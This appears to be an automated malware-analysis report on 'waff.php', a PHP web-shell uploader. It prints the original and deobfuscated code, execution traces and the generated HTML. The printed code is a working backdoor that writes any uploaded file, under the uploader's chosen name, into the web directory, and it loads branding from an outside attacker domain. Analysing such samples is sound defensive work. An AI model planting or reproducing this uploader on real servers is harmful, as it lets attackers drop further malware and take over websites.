PHP Malware Analysis
waff.php
md5: 6b9ac0c7b4ced30fac21377efcaf7d90
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- copy (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
URLs
- https://cdn.privdayz.com/images/logo.jpg (Deobfuscated, HTML, Original)
- https://privdayz.com/wp-content/themes/privdaysv1/hacker.css (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<script>
window.addEventListener("DOMContentLoaded",function(){let e=document.createElement("form");e.method="post",e.enctype="multipart/form-data";let t=document.createElement("input");t.type="file",t.name="file",t.required=!0;let n=document.createElement("button");n.type="submit",n.innerHTML="UP",e.appendChild(t),e.appendChild(n),document.body.appendChild(e)});
</script>
<link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css" rel="stylesheet"><center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url"/></center>
<?php
if ($_FILES) {
if (function_exists('move_uploaded_file')) {
if (move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
printf('uploaded: <a href="%s">%s</a><br/>', $_FILES['file']['name'], $_FILES['file']['name']);
} else {
print "fail";
}
} elseif (function_exists('copy')) {
if (copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
printf('uploaded: <a href="%s">%s</a><br/>', $_FILES['file']['name'], $_FILES['file']['name']);
} else {
print "failed";
}
}
}Execution traces
data/traces/6b9ac0c7b4ced30fac21377efcaf7d90_trace-1676256239.1997.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:44:25.097553]
1 0 1 0.000222 393512
1 3 0 0.000302 399120 {main} 1 /var/www/html/uploads/waff.php 0 0
1 3 1 0.000322 399120
0.000354 314224
TRACE END [2023-02-13 00:44:25.097728]
Generated HTML code
<html><head><script>
window.addEventListener("DOMContentLoaded",function(){let e=document.createElement("form");e.method="post",e.enctype="multipart/form-data";let t=document.createElement("input");t.type="file",t.name="file",t.required=!0;let n=document.createElement("button");n.type="submit",n.innerHTML="UP",e.appendChild(t),e.appendChild(n),document.body.appendChild(e)});
</script>
<link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css" rel="stylesheet"></head><body><center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url"></center>
<form method="post" enctype="multipart/form-data"><input type="file" name="file" required=""><button type="submit">UP</button></form></body></html>Original PHP code
<script>
window.addEventListener("DOMContentLoaded",function(){let e=document.createElement("form");e.method="post",e.enctype="multipart/form-data";let t=document.createElement("input");t.type="file",t.name="file",t.required=!0;let n=document.createElement("button");n.type="submit",n.innerHTML="UP",e.appendChild(t),e.appendChild(n),document.body.appendChild(e)});
</script>
<link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css" rel="stylesheet"><center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url"/></center>
<?php if($_FILES){if(function_exists('move_uploaded_file')){if(move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name'])){printf('uploaded: <a href="%s">%s</a><br/>',$_FILES['file']['name'],$_FILES['file']['name']);}else{print 'fail';}}elseif(function_exists('copy')){if(copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){printf('uploaded: <a href="%s">%s</a><br/>',$_FILES['file']['name'],$_FILES['file']['name']);}else{print 'failed';}}}
?>